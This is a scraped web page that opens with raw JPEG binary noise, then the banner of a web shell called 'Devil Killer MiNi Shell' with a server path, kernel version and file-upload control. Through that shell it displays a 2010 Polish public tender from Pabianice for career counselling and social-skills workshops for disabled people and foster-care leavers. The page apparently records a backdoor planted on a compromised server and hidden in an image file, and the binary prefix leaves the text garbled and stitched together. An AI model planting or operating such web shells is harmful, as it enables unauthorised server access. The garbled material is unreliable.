JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100423/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100423/95943-N-2010.html

<p class="kh_header"><b>Pabianice: Zorganizowanie i przeprowadzenie konsultacji indywidualnych i warsztatów grupowych z doradcą zawodowym oraz treningów kompetencji społecznych dla 60 beneficjentów ostatecznych projektu -Równe szanse-realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Pabianicach, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 95943 - 2010; data zamieszczenia: 23.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Pabianicach , ul. Traugutta 6a, 95-200 Pabianice, woj. łódzkie, tel. 0-42 215 66 05, faks 0-42 215 66 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr-pabianice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie konsultacji indywidualnych i warsztatów grupowych z doradcą zawodowym oraz treningów kompetencji społecznych dla 60 beneficjentów ostatecznych projektu -Równe szanse-realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Pabianicach, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie będzie realizowane dla 60 osób, będących podopiecznymi Powiatowego Centrum Pomocy Rodzinie w Pabianicach,  w tym : 20  pełnoletnich wychowanków rodzin zastępczych i placówek opiekuńczo-wychowawczych oraz 40 osób niepełnosprawnych. Są to beneficjenci ostateczni projektu systemowego -Równe szanse-, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Realizacja zamówienia składać się winna z następujących zadań:

1.Zorganizowanie i przeprowadzenie konsultacji indywidualnych z doradcą zawodowym, co do wyboru szkolenia dla 60 osób, rezerwując na każdego uczestnika konsultacji 1 godzinę zegarową.

 Zakres tematyczny doradztwa obejmuje: badanie    oczekiwań oraz potrzeb szkoleniowych pod kątem zdobywania umiejętności podnoszenia kwalifikacji zawodowych.

Szczegółowy opis realizacji zadania: 
- zajęcia indywidualne dla 40 b.o. powinny odbywać się na terenie miasta Pabianic, 
w siedzibie Powiatowego Centrum Pomocy Rodzinie ul. Tragutta 6 a, zaś w przypadku 20 b.o., którzy są uczestnikami Warsztatu Terapii Zajęciowej przy Spółdzielni Inwalidów -Zgoda-ul. 8-go Marca 1 w Konstantynowie Ł. , w siedzibie warsztatu,
- zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 18.00,
-w trakcie trwania konsultacji  wykonawca zapewni materiały szkoleniowe, niezbędne testy diagnostyczne wraz z materiałami biurowymi niezbędnymi do prowadzenia zajęć,
- obecność na konsultacjach będzie potwierdzana listą obecności, którą prowadzi wykonawca usługi.

2.Zorganizowanie i przeprowadzenie konsultacji indywidualnych z doradcą zawodowym dla 60 osób, rezerwując na każdego uczestnika konsultacji 2 godziny zegarowe.

Zakres tematyczny  doradztwa obejmuje:
- analizę dotychczasowego doświadczenia zawodowego oraz edukacji, 
- określenie słabych  i mocnych stron,
- ocenę kompetencji, umiejętności i predyspozycji pod kątem poszukiwania pracy, 
- opracowanie Indywidualnego Planu Działania. 

Szczegółowy opis realizacji zadania: 
- zajęcia indywidualne dla 40 b.o. powinny odbywać się na terenie miasta Pabianic, w siedzibie Powiatowego Centrum Pomocy Rodzinie ul. Tragutta 6 a, zaś w przypadku 20 b.o., którzy są uczestnikami Warsztatu Terapii Zajęciowej przy Spółdzielni Inwalidów -Zgoda-
ul. 8-go Marca 1 w Konstantynowie Ł. , w siedzibie warsztatu,
- zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 18.00,
-w trakcie trwania konsultacji  wykonawca zapewni materiały szkoleniowe, niezbędne testy diagnostyczne wraz z materiałami biurowymi niezbędnymi do prowadzenia zajęć,
- obecność na konsultacjach będzie potwierdzana listą obecności, którą prowadzi wykonawca usługi.

3.Zorganizowanie i przeprowadzenie treningu umiejętności społecznych dla 20 pełnoletnich wychowanków rodzin zastępczych i placówek opiekuńczo-wychowawczych polegających na zorganizowaniu i przeprowadzeniu 6- dniowych warsztatów wyjazdowych.

Zakres tematyczny:
-  zasady planowania i ustalania celów, 
-  aktywizacja zawodowa,
-  umiejętności interpersonalne i społeczne,
-  asertywność i metody radzenia sobie w sytuacjach konfliktowych.
	      
Szczegółowy opis realizacji zadania: 
	- czas trwania warsztatów  powinien wynieść 30 godzin zegarowych, jednak nie  
         więcej niż 6 godzin dziennie
	-w trakcie trwania warsztatów wykonawca zapewni materiały szkoleniowe wraz z 	  materiałami biurowymi niezbędnymi do prowadzenia warsztatów.
	-w trakcie trwania warsztatów wykonawca zapewni stały dostęp do napojów 	  	 chłodzących, kawy i herbaty.
	-wykonawca zapewni dojazd na miejsce i powrót  do Pabianic, zakwaterowanie,          	  5 noclegów, całodzienne wyżywienie ( trzy posiłki dziennie +przekąska w połowie 	  zajęć dopołudniowych),
	-miejscowość, w której będą przeprowadzane warsztaty powinna być oddalona od 	  Pabianic min.250 km.
-wykonawca zapewni hotel o następującym standardzie: 
	-pokoje maksymalnie 2- osobowe z łazienkami i wc. Wszystkie pokoje w jednym budynku. Nie dopuszcza się pokoi koedukacyjnych, 
	-sala (sale), w których odbywać się będą warsztaty powinny być usytuowane w tym samym budynku co miejsce zakwaterowania, powinny posiadać klimatyzację. Ponadto powinna)y posiadać  sprzęt audio-video, rzutnik multimedialny, ekran do wykorzystania podczas warsztatów,
	-w budynku powinno być zaplecze rekreacyjne
             - wykonawca zapewni w trakcie trwania warsztatów wyjazdowych: 2  
                wycieczki , w trakcie trwania których uczestnicy  mogliby zwiedzić okoliczne 
               atrakcje przyrodnicze i historyczne, oraz  2 wieczorki integracyjne ( np. ogniska).
	-wykonawca ubezpieczy uczestników warsztatów od następstw nieszczęśliwych 	    
        wypadków powstałych od chwili wyjazdu aż do powrotu do Pabianic.
	- wykonawca prowadzić będzie dziennik zajęć zgodny z ustalonym programem 	  	  szkolenia, listy obecności uczestników oraz dokumentację zdjęciową. 
	- wykonawca po  zakończeniu warsztatów wystawi certyfikaty, potwierdzające udział   	  i ukończenie warsztatów przez beneficjentów ostatecznych, zgodnie z   
        obowiązującymi aktami prawnymi; certyfikaty będą oznakowane zgodnie z 	  	  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego 	  Kapitał Ludzki (zamieszczony na stronie WUP w Łodzi); także materiały 	  	  szkoleniowe, listy obecności, dziennik zajęć, ankiety ewaluacyjne oraz 	   	 	  sale wykładowe zostaną oznaczone logotypem EFS i POKL zgodnie z projektem 	  zamawiającego,
     - wykonawca przedłoży zamawiającemu szczegółowy program warsztatów , zgodnie z  
       nakreśloną tematyką, który winien być załącznikiem do oferty.

4.Zorganizowanie i przeprowadzenie warsztatów z doradcą zawodowym na temat: (Jak skutecznie znaleźć pracę?) dla 20  pełnoletnich wychowanków rodzin zastępczych i placówek opiekuńczo-wychowawczych przez łączny czas 18 godzin zegarowych.

 Zakres tematyczny warsztatów: 
- techniki poszukiwania pracy,
- rynek pracy,
- sztuka autoprezentacji- odkrywanie własnych możliwości i umiejętności,
-bilans umiejętności, możliwości i predyspozycji zawodowych,
- umiejętności interpersonalne,
-dokumenty aplikacyjne,
-rozmowa kwalifikacyjna.

Szczegółowy opis realizacji zadania: 
- zajęcia warsztatowe powinny odbywać się na terenie Miasta Pabianic, od poniedziałku do piątku w godz. od 8.00 do 18.00,
-czas trwania warsztatów nie może przekroczyć 5 godzin zegarowych dziennie,
 -w trakcie trwania warsztatów wykonawca zapewni materiały szkoleniowe wraz z 	  materiałami biurowymi niezbędnymi do prowadzenia warsztatów,
-w trakcie trwania warsztatów wykonawca zapewni stały dostęp do napojów 	  	 chłodzących, kawy i herbaty,
- wykonawca umożliwi zamawiającemu dostarczenie serwisu obiadowego w trakcie bądź po zakończeniu zajęć warsztatowych,
- wykonawca prowadzić będzie dziennik zajęć zgodny z ustalonym programem 	  	  szkolenia, listy obecności uczestników oraz dokumentację zdjęciową. 
- wykonawca po  zakończeniu warsztatów wystawi certyfikaty, potwierdzające udział   	  i ukończenie warsztatów przez beneficjentów ostatecznych, zgodnie z obowiązującymi aktami prawnymi; certyfikaty będą oznakowane zgodnie z  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego  Kapitał Ludzki (zamieszczony na stronie WUP w Łodzi); także materiały szkoleniowe, listy obecności, dziennik zajęć, ankiety ewaluacyjne oraz  sale wykładowe zostaną oznaczone logotypem EFS i POKL zgodnie z projektem 	  zamawiającego,
- zamawiający zapewnia wykonawcy  możliwość korzystania z laptopa i rzutnika multimedialnego podczas prowadzenia warsztatów
 - wykonawca przedłoży zamawiającemu szczegółowy program warsztatów , zgodnie z     nakreśloną tematyką, który winien być załącznikiem do oferty.




5.Zorganizowanie i przeprowadzenie warsztatów z doradcą zawodowym na temat: 

(Jak skutecznie znaleźć pracę?) dla 40 osób niepełnosprawnych (w dwóch grupach po 20 uczestników) przez łączny czas  16 godzin zegarowych w każdej grupie.  

Zakres tematyczny warsztatów: 
- techniki poszukiwania pracy,
- rynek pracy,
- sztuka autoprezentacji- odkrywanie własnych możliwości i umiejętności,
-bilans umiejętności, możliwości i predyspozycji zawodowych,
- umiejętności interpersonalne,
-dokumenty aplikacyjne,
-rozmowa kwalifikacyjna.

Szczegółowy opis realizacji zadania: 
- zajęcia warsztatowe powinny odbywać się na terenie Miasta Pabianic, w przypadku jednej grupy, natomiast w przypadku drugiej grupy w siedzibie Warsztatu Terapii Zajęciowej przy Spółdzielni Inwalidów -Zgoda- ul. 8-go Marca 1 w Konstantynowie Ł.,
od poniedziałku do piątku w godz. od 8.00 do 18.00,
-czas trwania warsztatów nie może przekroczyć 4 godzin zegarowych dziennie,
-sala , w której prowadzone będą warsztaty na terenie Miasta Pabianic powinna być pozbawiona barier architektonicznych,
 -w trakcie trwania warsztatów wykonawca zapewni materiały szkoleniowe wraz z 	  materiałami biurowymi niezbędnymi do prowadzenia warsztatów,
-w trakcie trwania warsztatów wykonawca zapewni stały dostęp do napojów 	  	 chłodzących, kawy i herbaty,
- wykonawca umożliwi zamawiającemu dostarczenie serwisu obiadowego w trakcie bądź po zakończeniu zajęć warsztatowych,
- wykonawca prowadzić będzie dziennik zajęć zgodny z ustalonym programem 	  	  szkolenia, listy obecności uczestników oraz dokumentację zdjęciową,
- zamawiający zapewnia wykonawcy  możliwość korzystania z laptopa i rzutnika multimedialnego podczas prowadzenia warsztatów
- wykonawca po  zakończeniu warsztatów wystawi certyfikaty, potwierdzające udział   	  i ukończenie warsztatów przez beneficjentów ostatecznych, zgodnie z obowiązującymi aktami prawnymi; certyfikaty będą oznakowane zgodnie z  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego  Kapitał Ludzki (zamieszczony na stronie WUP w Łodzi); także materiały szkoleniowe, listy obecności, dziennik zajęć, ankiety ewaluacyjne oraz  sale wykładowe zostaną oznaczone logotypem EFS i POKL zgodnie z projektem 	  zamawiającego,
 - wykonawca przedłoży zamawiającemu szczegółowy program warsztatów , zgodnie z     nakreśloną tematyką, który winien być załącznikiem do oferty.



6.Zorganizowanie i przeprowadzenie warsztatów  z psychologiem polegających na treningu umiejętności społecznych  dla 40  osób niepełnosprawnych, w dwóch grupach po 20 osób,  przez  łączny czas 20 godzin zegarowych  w każdej grupie. 

Zakres tematyczny warsztatów: 
- zasady automotywacji oraz planowania,
- umiejętności interpersonalne oraz społeczne,
-asertywności i radzenie sobie w sytuacjach trudnych
Szczegółowy opis realizacji zadania: 
- zajęcia warsztatowe powinny odbywać się na terenie Miasta Pabianic, w przypadku jednej grupy, natomiast w przypadku drugiej grupy w siedzibie Warsztatu Terapii Zajęciowej przy Spółdzielni Inwalidów -Zgoda- ul. 8-go Marca 1 w Konstantynowie Ł.,
od poniedziałku do piątku w godz. od 8.00 do 18.00,
-czas trwania warsztatów nie może przekroczyć 4 godzin zegarowych dziennie,
-sala , w której prowadzone będą warsztaty na terenie Miasta Pabianic powinna być pozbawiona barier architektonicznych,
 -w trakcie trwania warsztatów wykonawca zapewni materiały szkoleniowe wraz z 	  materiałami biurowymi niezbędnymi do prowadzenia warsztatów,
-w trakcie trwania warsztatów wykonawca zapewni stały dostęp do napojów 	  	 chłodzących, kawy i herbaty,
- wykonawca umożliwi zamawiającemu dostarczenie serwisu obiadowego w trakcie bądź po zakończeniu zajęć warsztatowych,
- wykonawca prowadzić będzie dziennik zajęć zgodny z ustalonym programem 	  	  szkolenia, listy obecności uczestników oraz dokumentację zdjęciową,
- zamawiający zapewnia wykonawcy  możliwość korzystania z laptopa i rzutnika multimedialnego podczas prowadzenia warsztatów
- wykonawca po  zakończeniu warsztatów wystawi certyfikaty, potwierdzające udział   	  i ukończenie warsztatów przez beneficjentów ostatecznych, zgodnie z obowiązującymi aktami prawnymi; certyfikaty będą oznakowane zgodnie z  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego  Kapitał Ludzki (zamieszczony na stronie WUP w Łodzi); także materiały szkoleniowe, listy obecności, dziennik zajęć, ankiety ewaluacyjne oraz  sale wykładowe zostaną oznaczone logotypem EFS i POKL zgodnie z projektem 	  zamawiającego,
 - wykonawca przedłoży zamawiającemu szczegółowy program warsztatów , zgodnie z     nakreśloną tematyką, który winien być załącznikiem do oferty.



W każdym zadaniu wykonawca powinien zapewnić:
- odpowiednią kadrę szkoleniową:  doradców zawodowych oraz psychologów z odpowiednimi    kwalifikacjami, oraz doświadczeniem w przeprowadzeniu tego typu zajęć
- odpowiednie sale szkoleniowe gwarantujące bezpieczne i higieniczne warunki dla uczestników zajęć,
- ubezpieczenie uczestników szkolenia na każdym etapie od skutków nieszczęśliwych   
  wypadków powstałych w związku z zajęciami, a także w drodze do miejsca zajęć i z 
   powrotem,

Zamawiający zastrzega sobie, iż liczba beneficjentów ostatecznych uczestniczących w ww. zadaniach może ulec zmniejszeniu.
Terminy realizacji zamówienia:

	Zadanie 1: między 10 maja, a 31 maja 2010r
	Zadanie 2: między 1 czerwcem, a  15 lipca 2010r.
	Zadanie 3: miedzy 1 sierpnia, a 31 sierpnia 2010r.
	Zadanie 4: między 1 czerwcem, a 30 czerwcem 2010r.
	Zadanie 5: między 1 czerwcem a 31 lipcem 2010r.
	Zadanie 6: między 1 czerwcem, a 31 lipcem 2010r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia stanowiącego załącznik nr 2 do  specyfikacji i załączenie go do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aby potwierdzić ten warunek należy udokumentować wykonanie  w okresie ostatnich trzech lat co najmniej 15 usług, a jeżeli okres  prowadzenia działalności  jest krótszy - w tym okresie, odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, oraz udokumentować, że w tym okresie przeszkolono co najmniej 200 osób niepełnosprawnych lub pełnoletnich wychowanków rodzin zastępczych i placówek opiekuńczo-wychowawczych w tematyce odpowiadającej przedmiotowi zamówienia. Za usługi odpowiadające swoim    rodzajem i wartością usługom stanowiącym przedmiot zamówienia zamawiający uważać będzie usługi polegające na organizacji warsztatów doradztwa i  konsultacji na temat poszukiwania pracy i  wyboru zawodu, a także szkoleniu osób niepełnosprawnych lub pełnoletnich wychowanków rodzin zastępczych i placówek opiekuńczo-wychowawczych zarówno w trybie stacjonarnym jak i przy pomocy warsztatów wyjazdowych za łączną kwotę brutto nie mniejszą niż 200 000 zł, w ciągu ostatnich 3 lat.

Potwierdzeniem spełnienia tego warunku będzie wypełnienie i podpisanie załącznika nr 3 do specyfikacji  wraz z załączeniem dokumentów świadczących, że usługi wymienione w załączniku zostały wykonane należycie /referencje/ oraz oświadczenia zawartego w tym załączniku potwierdzającego przeszkolenie 200 osób w tematyce odpowiadającej przedmiotowi zamówienia. Załącznik z dokumentami potwierdzającymi  należyte wykonanie usług należy załączyć do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aby potwierdzić warunek posiadania /dysponowania/ potencjałem technicznym należy udokumentować spełnienie oczekiwań zamawiającego   dotyczących warunków zakwaterowania  zawartych w szczegółowym opisie  przedmiotu zamówienia i sposobu jego realizacji. Potwierdzeniem spełnienia tego warunku będzie wypełnienie i podpisanie załącznika nr 4 do  specyfikacji, który winien stanowić załącznik do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aby udokumentować posiadanie niezbędnej kadry do realizacji tego zamówienia publicznego  czyli doradców zawodowych posiadających wyższe wykształcenie o specjalności doradztwa zawodowego, lub wyższe wykształcenie i studia podyplomowe w zakresie doradztwa zawodowego, a w odniesieniu do psychologa posiadanie przez niego wykształcenia wyższego kierunkowego należy  potwierdzić dysponowanie taką kadrą.

Potwierdzeniem spełnienia tego warunku będzie wypełnienie i podpisanie 	 załącznika nr 4 do niniejszej specyfikacji, który winien stanowić załącznik do 	      oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem tego warunku będzie załączenie dokumentu lub potwierdzonej    
kserokopii :

- o posiadaniu ubezpieczenia OC w zakresie prowadzonej działalności     
 gospodarczej,  obejmujące przedmiot zamówienia, na kwotę nie mniejszą niż    
 50.000,00 zł.
    
-  aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz
właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie
zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności,lub wstrzymanie w całości wykonania decyzji właściwego organu -
wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, gdy ofertę składa kilka podmiotów działających wspólnie dotyczy to
 każdego z nich.

Dokumenty te winny być załączone do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr-pabianice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Pabianicach
